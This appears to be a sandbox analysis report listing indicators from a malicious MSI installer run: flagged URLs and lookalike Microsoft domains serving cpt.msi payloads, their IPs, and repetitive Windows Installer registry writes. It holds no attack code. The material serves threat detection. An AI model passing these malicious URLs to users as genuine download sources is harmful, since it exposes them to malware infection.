There are 92 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://ggg-logistics.com/
malicious
https://ggg-logistics.com/
malicious
https://dnsg-microsoftds-data.com/sign/
unknown
malicious
https://dnsg-microsoftds-data.com/sign/cpt.msi-1170417712311832210
unknown
http://appsyndication.org/2006/appsynapplicationd:
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-924627712311832210
unknown
https://dnsg-microsoftds-data.com/sign/&
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1225547712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1569547712311832210
unknown
https://dnsg-microsoftds-data.com/sign/$
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1180707712311832210
unknown
http://windows-msn-cn.org/5ktzQ4gu
104.21.69.237
https://dnsg-microsoftds-data.com/sign/cpt.msi-1106977712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1094787712311832210
unknown
http://c.pki.goog/r/r4.crl
142.250.113.94
https://dnsg-microsoftds-data.com/sign/cpt.msi-1145097712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1033227712311832210
unknown
http://events-data-microsoft.live/h8xiyPNTne
104.21.86.195
https://dnsg-microsoftds-data.com/sign/cpt.msi-938227712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-999007712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1043537712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1071507712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1053537712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-968377712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1235387712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi0C:
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1212737712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1246797712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1015567712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1132127712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-989007712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-915417712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-956667712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1080877712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1158847712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1121977712311832210
unknown
https://dnsg-microsoftds-data.com/sign/cpt.msi-1200547712311832210
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
events-data-microsoft.live
104.21.86.195
malicious
dnsg-microsoftds-data.com
104.21.84.21
malicious
windows-msn-cn.org
104.21.69.237
www.google.com
142.251.186.103
ggg-logistics.com
162.254.39.23

IPs

IP
Domain
Country
Malicious
104.21.84.21
dnsg-microsoftds-data.com
United States
malicious
104.21.86.195
events-data-microsoft.live
United States
malicious
192.168.2.5
unknown
unknown
162.254.39.23
ggg-logistics.com
United States
142.251.186.103
www.google.com
United States
104.21.69.237
windows-msn-cn.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adc9.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adc9.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\A4B3042E19B70DA4180227A5615F9C7B
478E737A8DC283743BF899687E8D9C9C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
LocalPackage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\86E70A3B203B4EB4880488D8F36B6AE5
478E737A8DC283743BF899687E8D9C9C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\InstallProperties
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9}
DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\478E737A8DC283743BF899687E8D9C9C
MainFeature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Features
MainFeature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
ProductName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
PackageCode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
Assignment
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
AdvertiseFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
InstanceType
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
AuthorizedLUAApp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
DeploymentFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\UpgradeCodes\86E70A3B203B4EB4880488D8F36B6AE5
478E737A8DC283743BF899687E8D9C9C
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C\SourceList
PackageName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C\SourceList\URL
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C\SourceList\Media
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C
Clients
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C\SourceList
LastUsedSource
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\478E737A8DC283743BF899687E8D9C9C\SourceList\URL
SourceType
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adcc.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adcc.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adce.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adce.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add0.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add0.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add2.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add2.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add4.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add4.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add6.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add6.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add8.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58add8.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adda.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58adda.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58addc.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\58addc.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\478E737A8DC283743BF899687E8D9C9C\Patches
AllPatches